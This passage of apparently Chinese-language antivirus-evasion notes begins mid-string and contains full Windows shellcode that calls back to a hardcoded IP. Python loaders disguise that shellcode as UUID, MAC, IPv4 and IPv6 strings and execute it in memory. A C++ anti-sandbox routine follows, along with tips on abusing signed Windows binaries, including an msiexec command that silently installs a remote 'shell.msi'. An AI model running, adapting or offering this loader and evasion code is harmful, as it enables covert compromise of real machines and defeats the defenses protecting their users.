x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x60\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x31\x73\x68\x51\x00\x27\x6b\x08\x03\x3f\x21\xf1\xec\xd6\xc0\x3b\xae\xe3\xab\x55\x82\xf4\x40\xbc\x5b\x9f\xfa\x45\xbd\x37\x51\x3b\xe0\x0d\xa4\x3b\xb2\xd1\xf9\x74\xda\x3a\xd8\x44\xb1\x60\x84\xc5\x83\x10\x70\x5e\x54\x63\xc7\xf8\xf8\x74\x9b\x2b\x6a\x35\x08\xd5\x11\xa9\x32\x98\xec\xd8\x01\xf0\xc4\xae\x4b\x4b\x6c\xba\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x53\x50\x29\x0d\x0a\x00\x36\x33\x5a\x21\x1c\xe3\x65\x2d\x0e\x19\xa1\xd3\x4c\xf9\x56\xc3\x4e\x54\x7e\x1c\x21\x38\x30\xf3\xf7\x7f\x4a\x21\x52\xb8\x55\x9f\xd0\x0f\x25\x99\x79\x4a\x2b\xcc\xd7\x09\x95\x74\x3b\xee\x1c\xfa\xad\xbd\xec\x84\x00\xdb\xd8\x58\x89\xb8\xad\xd3\x86\x5b\xd3\x09\xc2\xcd\xb6\xfd\x9e\x9f\xb2\x26\xc8\xaa\xfc\x0e\xc9\xf8\xa2\xfd\x5c\x99\x91\xb7\x08\x11\xd8\x91\xde\xfe\x43\x95\x1c\x96\x29\x08\x55\x39\x21\x7d\x8c\xd5\xac\x46\x6e\x78\x65\x16\xb9\xf1\x53\xc6\x25\x76\x78\xd7\xfd\xdd\xb0\x7f\x40\xea\x7f\x68\xba\x6e\x5d\x99\x55\x5f\x11\xd9\x05\x90\x92\x2c\x9e\xb3\x75\x5e\x73\x72\x81\x4d\xe0\x00\xa6\x38\x0b\xed\xe5\x4e\xcb\x8d\xd1\x44\x12\xb3\xf8\xd0\x3a\xcc\xd6\x06\xf1\x36\x4f\x8e\x66\x39\x66\x42\xe3\xc7\x74\xa5\xbd\xac\x0d\xe6\xe5\xd3\x53\x0c\x8e\x90\xca\xd3\x01\x0d\x88\x7c\x91\x63\xdb\xe2\xd9\xb3\x4d\x9f\x57\x3b\x64\x31\x8a\x66\xea\x78\xeb\x07\x09\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x34\x33\x2e\x31\x33\x38\x2e\x32\x37\x2e\x31\x32\x00\x49\x96\x02\xd2" def UUIDConvert (shellcode ): uuid_shellcode = [] if len (shellcode) % 16 != 0 : null_byte = b'\x00' * (16 - len (shellcode) % 16 ) shellcode += null_byte for i in range (0 , len (shellcode), 16 ): uuid_string = str (uuid.UUID(bytes_le=shellcode[i: i + 16 ])) uuid_shellcode.append(uuid_string) return uuid_shellcode uuid_shellcode = UUIDConvert(shellcode=shellcode) ctypes.windll.Activeds.AllocADsMem.restype = ctypes.c_uint64 ptr_alloc = ctypes.windll.Activeds.AllocADsMem(ctypes.c_int(len (shellcode))) ptr_realloc = ctypes.windll.Activeds.ReallocADsMem(ptr_alloc, len (shellcode), len (shellcode)) ctypes.windll.kernel32.VirtualProtect(ptr_realloc, ctypes.c_int(len (shellcode)), 0x40 , ctypes.byref(ctypes.c_long(1 ))) ptr = ptr_realloc for code in uuid_shellcode: ctypes.windll.Rpcrt4.UuidFromStringA(code, ptr) ptr += 16 ctypes.windll.kernel32.EnumSystemLocalesW(ptr_realloc, 0 )
python mac内存加载 https://blog.csdn.net/luochen2436/article/details/124035788
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 import ctypesshellcode=b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x60\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x31\x73\x68\x51\x00\x27\x6b\x08\x03\x3f\x21\xf1\xec\xd6\xc0\x3b\xae\xe3\xab\x55\x82\xf4\x40\xbc\x5b\x9f\xfa\x45\xbd\x37\x51\x3b\xe0\x0d\xa4\x3b\xb2\xd1\xf9\x74\xda\x3a\xd8\x44\xb1\x60\x84\xc5\x83\x10\x70\x5e\x54\x63\xc7\xf8\xf8\x74\x9b\x2b\x6a\x35\x08\xd5\x11\xa9\x32\x98\xec\xd8\x01\xf0\xc4\xae\x4b\x4b\x6c\xba\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x53\x50\x29\x0d\x0a\x00\x36\x33\x5a\x21\x1c\xe3\x65\x2d\x0e\x19\xa1\xd3\x4c\xf9\x56\xc3\x4e\x54\x7e\x1c\x21\x38\x30\xf3\xf7\x7f\x4a\x21\x52\xb8\x55\x9f\xd0\x0f\x25\x99\x79\x4a\x2b\xcc\xd7\x09\x95\x74\x3b\xee\x1c\xfa\xad\xbd\xec\x84\x00\xdb\xd8\x58\x89\xb8\xad\xd3\x86\x5b\xd3\x09\xc2\xcd\xb6\xfd\x9e\x9f\xb2\x26\xc8\xaa\xfc\x0e\xc9\xf8\xa2\xfd\x5c\x99\x91\xb7\x08\x11\xd8\x91\xde\xfe\x43\x95\x1c\x96\x29\x08\x55\x39\x21\x7d\x8c\xd5\xac\x46\x6e\x78\x65\x16\xb9\xf1\x53\xc6\x25\x76\x78\xd7\xfd\xdd\xb0\x7f\x40\xea\x7f\x68\xba\x6e\x5d\x99\x55\x5f\x11\xd9\x05\x90\x92\x2c\x9e\xb3\x75\x5e\x73\x72\x81\x4d\xe0\x00\xa6\x38\x0b\xed\xe5\x4e\xcb\x8d\xd1\x44\x12\xb3\xf8\xd0\x3a\xcc\xd6\x06\xf1\x36\x4f\x8e\x66\x39\x66\x42\xe3\xc7\x74\xa5\xbd\xac\x0d\xe6\xe5\xd3\x53\x0c\x8e\x90\xca\xd3\x01\x0d\x88\x7c\x91\x63\xdb\xe2\xd9\xb3\x4d\x9f\x57\x3b\x64\x31\x8a\x66\xea\x78\xeb\x07\x09\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x34\x33\x2e\x31\x33\x38\x2e\x32\x37\x2e\x31\x32\x00\x49\x96\x02\xd2" ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 mac_address = ctypes.windll.kernel32.VirtualAlloc(0 , len (shellcode) / 6 * 17 , 0x3000 , 0x40 ) for i in range (len (shellcode) / 6 ): cut_byte = shellcode[i * 6 :6 + i * 6 ] ctypes.windll.Ntdll.RtlEthernetAddressToStringA(cut_byte, mac_address + i * 17 ) mac_list = [] for i in range (len (shellcode) // 6 ): mac = ctypes.string_at(mac_address + i * 17 , 17 ) mac_list.append(mac) ptr = ctypes.windll.kernel32.VirtualAlloc(0 ,len (mac_list)*6 ,0x3000 ,0x04 ) ptr1 = ptr for i in range (len (mac_list)): ctypes.windll.Ntdll.RtlEthernetStringToAddressA(mac_list[i], mac_list[i], ptr1) ptr1 += 6 ctypes.windll.kernel32.VirtualProtect(ptr, len (mac_list)*6 , 0x40 , ctypes.byref(ctypes.c_long(1 ))) handle = ctypes.windll.kernel32.CreateThread(0 , 0 , ptr, 0 , 0 , 0 ) ctypes.windll.kernel32.WaitForSingleObject(handle, -1 )
python ipv4内存加载器 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 shellcode = "\xfc\x48\x83......x00\x00" ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ipv4_address = ctypes.windll.kernel32.VirtualAlloc(0 ,ctypes.c_int(len (shellcode)//4 *16 ),0x3000 ,0x40 ) for i in range (len (shellcode)//4 ): cut_byte = shellcode[i*4 :4 +i*4 ] ctypes.windll.Ntdll.RtlIpv4AddressToStringA(cut_byte, ipv4_address+i*16 ) ipv4_list = [] for i in range (len (shellcode)//4 ): ipv4_str = ctypes.string_at(ipv4address+i*16 ,16 ) ipv4_list.append(ipv4_str) ptr = ctypes.windll.kernel32.VirtualAlloc(0 , len (shellcode), 0x3000 , 0x40 ) ptr1 = ptr for i in range (len (ipv4_list)): ctypes.windll.Ntdll.RtlIpv4StringToAddressA(ipv4_list[i],False ,ipv4_list[i],ptr1) ptr1 += 4 handle = ctypes.windll.kernel32.CreateThread(0 , 0 , ptr, 0 , 0 , 0 ) ctypes.windll.kernel32.WaitForSingleObject(handle, -1 )
python ipv6内存加载器 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 import ctypesshellcode=b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x60\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x31\x73\x68\x51\x00\x27\x6b\x08\x03\x3f\x21\xf1\xec\xd6\xc0\x3b\xae\xe3\xab\x55\x82\xf4\x40\xbc\x5b\x9f\xfa\x45\xbd\x37\x51\x3b\xe0\x0d\xa4\x3b\xb2\xd1\xf9\x74\xda\x3a\xd8\x44\xb1\x60\x84\xc5\x83\x10\x70\x5e\x54\x63\xc7\xf8\xf8\x74\x9b\x2b\x6a\x35\x08\xd5\x11\xa9\x32\x98\xec\xd8\x01\xf0\xc4\xae\x4b\x4b\x6c\xba\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x53\x50\x29\x0d\x0a\x00\x36\x33\x5a\x21\x1c\xe3\x65\x2d\x0e\x19\xa1\xd3\x4c\xf9\x56\xc3\x4e\x54\x7e\x1c\x21\x38\x30\xf3\xf7\x7f\x4a\x21\x52\xb8\x55\x9f\xd0\x0f\x25\x99\x79\x4a\x2b\xcc\xd7\x09\x95\x74\x3b\xee\x1c\xfa\xad\xbd\xec\x84\x00\xdb\xd8\x58\x89\xb8\xad\xd3\x86\x5b\xd3\x09\xc2\xcd\xb6\xfd\x9e\x9f\xb2\x26\xc8\xaa\xfc\x0e\xc9\xf8\xa2\xfd\x5c\x99\x91\xb7\x08\x11\xd8\x91\xde\xfe\x43\x95\x1c\x96\x29\x08\x55\x39\x21\x7d\x8c\xd5\xac\x46\x6e\x78\x65\x16\xb9\xf1\x53\xc6\x25\x76\x78\xd7\xfd\xdd\xb0\x7f\x40\xea\x7f\x68\xba\x6e\x5d\x99\x55\x5f\x11\xd9\x05\x90\x92\x2c\x9e\xb3\x75\x5e\x73\x72\x81\x4d\xe0\x00\xa6\x38\x0b\xed\xe5\x4e\xcb\x8d\xd1\x44\x12\xb3\xf8\xd0\x3a\xcc\xd6\x06\xf1\x36\x4f\x8e\x66\x39\x66\x42\xe3\xc7\x74\xa5\xbd\xac\x0d\xe6\xe5\xd3\x53\x0c\x8e\x90\xca\xd3\x01\x0d\x88\x7c\x91\x63\xdb\xe2\xd9\xb3\x4d\x9f\x57\x3b\x64\x31\x8a\x66\xea\x78\xeb\x07\x09\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x34\x33\x2e\x31\x33\x38\x2e\x32\x37\x2e\x31\x32\x00\x49\x96\x02\xd2" if len (shellcode) % 16 != 0 : null_byte = b'\x00' * (16 - len (shellcode) % 16 ) shellcode += null_byte ctypes.windll.Activeds.AllocADsMem.restype = ctypes.c_uint64 ptr_alloc_1 = ctypes.windll.Activeds.AllocADsMem(ctypes.c_int(len (shellcode) // 16 * 40 )) ptr_realloc_1 = ctypes.windll.Activeds.ReallocADsMem(ptr_alloc_1, len (shellcode) // 16 * 40 , len (shellcode) // 16 * 40 ) ctypes.windll.kernel32.VirtualProtect(ptr_realloc_1, ctypes.c_int(len (shellcode) // 16 * 40 ), 0x40 , ctypes.byref(ctypes.c_long(1 ))) for i in range (len (shellcode) // 16 ): bytes_shellcode = shellcode[i * 16 : 16 + i * 16 ] ctypes.windll.Ntdll.RtlIpv6AddressToStringA(bytes_shellcode, ptr_realloc_1 + i * 40 ) ipv6_list = [] for i in range (len (shellcode) // 16 ): ipv6 = ctypes.string_at(ptr_realloc_1 + i * 40 , 40 ) ipv6_list.append(ipv6) print (ipv6_list)ptr_alloc_2 = ctypes.windll.Activeds.AllocADsMem(ctypes.c_int(len (shellcode))) ptr_realloc_2 = ctypes.windll.Activeds.ReallocADsMem(ptr_alloc_1, len (shellcode), len (shellcode)) ctypes.windll.kernel32.VirtualProtect(ptr_realloc_2, ctypes.c_int(len (shellcode)), 0x40 , ctypes.byref(ctypes.c_long(1 ))) rwxpage = ptr_realloc_2 for i in range (len (ipv6_list)): ctypes.windll.Ntdll.RtlIpv6StringToAddressA(ipv6_list[i], ipv6_list[i], rwxpage) rwxpage += 16 ctypes.windll.kernel32.EnumSystemLocalesW(ptr_realloc_2, 0 )
nim shellcode免杀 参考:https://xz.aliyun.com/t/11052
特征码修改 –花指令添加 —upx加壳 思路参考(比较老)
https://blog.51cto.com/match/1401629
https://bbs.kanxue.com/thread-97345.htm
DLL劫持 https://xz.aliyun.com/t/11711
https://f002.backblazeb2.com/file/sec-news-backup/files/writeup/www.freebuf.com/_articles_78807_html/index.html
https://www.freebuf.com/articles/system/324598.html
https://tttang.com/archive/1365/#toc_0x09
https://sec-in.com/article/1562
https://skewwg.github.io/2020/11/26/diao-yu-yu-she-gong-xi-lie-zhi-dll-jie-chi/
syscall免杀介绍: 参考:https://xz.aliyun.com/t/11448
https://xz.aliyun.com/t/11496#toc-2
https://xz.aliyun.com/t/11532#toc-11
反沙箱检测 参考:
https://www.freebuf.com/articles/system/202717.html
https://www.anquanke.com/post/id/186218
https://forum.butian.net/share/758
https://drunkmars.top/2021/10/04/%E5%8F%8D%E6%B2%99%E7%AE%B1%E8%B0%83%E8%AF%95/
1 2 3 4 5 6 7 8 9 很多杀软都有自己的后端云沙箱,这些沙箱能够模拟出软件执行所需的运行环境,通过进程hook技术来对软件执行过程中的行为进行分析,判断其是否有敏感的操作行为,或者更高级的检测手法是,将获取到的程序的API调用序列以及其他的一些行为特征输入到智能分析引擎中进行检测。所以,如果我们的木马没有做好反调试,很容易就被沙箱检测出来。 前言 最简单的反调试的措施就是检测父进程。一般来说,我们手动点击执行的程序的父进程都是explorer。如果一个程序的父进程不是explorer,那么我们就可以认为他是由沙箱启动的。那么我们就直接exit退出,这样,杀软就无法继续对我们进行行为分析了。 这里主要的思路是获取调用kernel32库中的CreateToolhelp32Snapshot函数获得一个进程快照信息,然后从快照中获取到explorer.exe的进程id信息,然后通过当前进程的pid信息在进程快照中找到其父进程的id信息,最后将两者进行比较,判断当前进程是否是有人工启动的。 反调试的措施不仅仅是检测父进程,还可以通过调用windows的API接口IsDebuggerPresent来检查当前进程是否正在被调试。
代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 #include <iostream> #include <windows.h> #include <tlhelp32.h> #include <tchar.h> DWORD get_parent_processid (DWORD pid) DWORD ParentProcessID = -1 ; PROCESSENTRY32 pe; HANDLE hkz; HMODULE hModule = LoadLibrary (_T("Kernel32.dll" )); FARPROC Address = GetProcAddress (hModule, "CreateToolhelp32Snapshot" ); if (Address == NULL ) { OutputDebugString (_T("GetProc error" )); return (-1 ); } _asm { push 0 push 2 call Address mov hkz, eax } pe.dwSize = sizeof (PROCESSENTRY32); if (Process32First (hkz, &pe)) { do { if (pe.th32ProcessID == pid) { ParentProcessID = pe.th32ParentProcessID; break ; } } while (Process32Next (hkz, &pe)); } return ParentProcessID;} DWORD get_explorer_processid () { DWORD explorer_id = -1 ; PROCESSENTRY32 pe; HANDLE hkz; HMODULE hModule = LoadLibrary (_T("Kernel32.dll" )); if (hModule == NULL ) { OutputDebugString (_T("Loaddll error" )); return (-1 ); } FARPROC Address = GetProcAddress (hModule, "CreateToolhelp32Snapshot" ); if (Address == NULL ) { OutputDebugString (_T("GetProc error" )); return (-1 ); } _asm { push 0 push 2 call Address mov hkz, eax } pe.dwSize = sizeof (PROCESSENTRY32); if (Process32First (hkz, &pe)) { do { if (_wcsicmp(pe.szExeFile, L"explorer.exe" ) == 0 ) { explorer_id = pe.th32ProcessID; break ; } } while (Process32Next (hkz, &pe)); } return explorer_id;} int main () DWORD explorer_id = get_explorer_processid (); DWORD parent_id = get_parent_processid (GetCurrentProcessId ()); if (explorer_id == parent_id) { MessageBox (0 , L"Not sandbox" , L"Success" , 0 ); } else { exit (1 ); } }
二开cs环境准备 参考:
https://www.ol4three.com/2021/11/09/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/CobaltStrike/CobaltStrike%E4%BA%8C%E5%BC%80%E7%8E%AF%E5%A2%83%E5%88%9D%E6%8E%A2/
白名单 一、MSBuild.exe介绍 Microsoft Build Engine是一个用于构建应用程序的平台,此引擎也被称为msbuild,它为项目文件提供一个XML模式,该模式控制构建平台如何处理和构建软件。Visual Studio使用MSBuild,但它不依赖于Visual Studio。通过在项目或解决方案文件中调用msbuild.exe,可以在未安装Visual Studio的环境中编译和生成程序。
说明:Msbuild.exe所在路径没有被系统添加PATH环境变量中,因此,Msbuild命令无法直接在cmd中使用。需要带上路径:C:\Windows\Microsoft.NET\Framework\v4.0.30319。
适用条件:.NET Framework>=4.0
xml配置文件写法:
https://www.cnblogs.com/LyShark/p/11331476.html
https://micro8.gitbook.io/micro8/contents-1/71-80/71-ji-yu-bai-ming-dan-msbuild.exe-zhi-hang-payload-di-yi-ji
https://pplsec.github.io/2019/03/26/MSBuild.exe-bypass-application-whitelisting/
http://wiki.tidesec.com/docs/bypassav
https://www.freebuf.com/articles/network/197706.html
二、msiexec.exe介绍 看到msiexec可能还有点陌生,但说道.msi可能就比较熟悉了,在windows下很多软件安装就是.msi格式的。当Windows操作系统安装了Windows Installer引擎,而MSI软件包使用该引擎来 安装应用程序,解释包和安装产品的可执行程序就是我们这用到 的Msiexec.exe。
之前在介绍免杀工具的时候有些工具就可以生成msi格式的payload,比如专题6介绍的venom:https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ,其实msfvenom也可以生成msi格式的payload,不过被杀软查杀的比较厉害了。
msi文件可以双击执行,也可以命令行静默执行,而且msiexec也同样支持远程下载功能,将msi文件上传到服务器,通过如下命令远程执行:
1 msiexec /q /i http://www.tidesec.com/shell/shell.msi
参考:https://www.cnblogs.com/backlion/p/10493910.html
http://wiki.tidesec.com/docs/bypassav
三、Mshta.exe介绍 Mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件。 目前正常的hta文件用到的很少,偶尔见到了很可能就是恶意软件,很多免杀工具都是对shellcode进行处理后生产.hta文件,在windows下可以直接执行。 之前工具篇里多个工具都可以生成hta后门:
参考文章:https://www.cnblogs.com/backlion/p/10491616.html (多种方法)
四、InstallUtil.exe介绍 InstallUtil.exe算是免杀白名单里使用比较多的一个了,InstallUtil.exe可以用于安装有.NET开发的所有应用安装程序,如果要使用 .NET Framework 开发 Windows 服务,则可以使用installutil.exe命令行快速安装服务应用程序。
利用过程参考:
https://pplsec.github.io/2019/03/26/InstallUtil&csc.exe-bypass-application-whitelisting/
http://wiki.tidesec.com/docs/bypassav (专题36)
五、Rundll32.exe介绍 Rundll32.exe,可以执行32位的DLL文件,以命令行的方式调用动态链接程序库。。它的作用是执行DLL文件中的内部函数,这样在进程当中,只会有Rundll32.exe,而不会有DLL后门的进程,这样就实现了进程上的隐藏。系统中还有一个Rundll.exe文件,可以执行16位的DLL文件。
DLL文件对于Window的操作系统非常重要,它还决定了自定义Windows的其他程序的运行。动态链接库(DLL)文件是一种文件类型,它向其他程序提供有关如何调用某些内容的指令。因此,多个软件甚至可以同时共享这样的DLL文件。尽管与.exe文件的格式相同,但DLL文件不能像.exe文件那样直接执行。dll文件扩展名可以是:.dll(动态链接库)、.ocx(ActiveX控件)、.cpl(控制面板)、.drv(设备驱动程序)。
Rundll32.exe令行下的使用方法为:Rundll32.exe DLLname,Functionname,需注意x86,x64位的Rundll32调用,64位的系统默认调用的是64位Rundll32.exe(在C:\Windows\System32目录下)。
Windows 7 默认位置:
64位 C:\Windows\System32\rundll32.exe
32位 C:\Windows\SysWOW64\rundll32.exe
利用方式可以参考:
https://www.cnblogs.com/backlion/p/10488747.html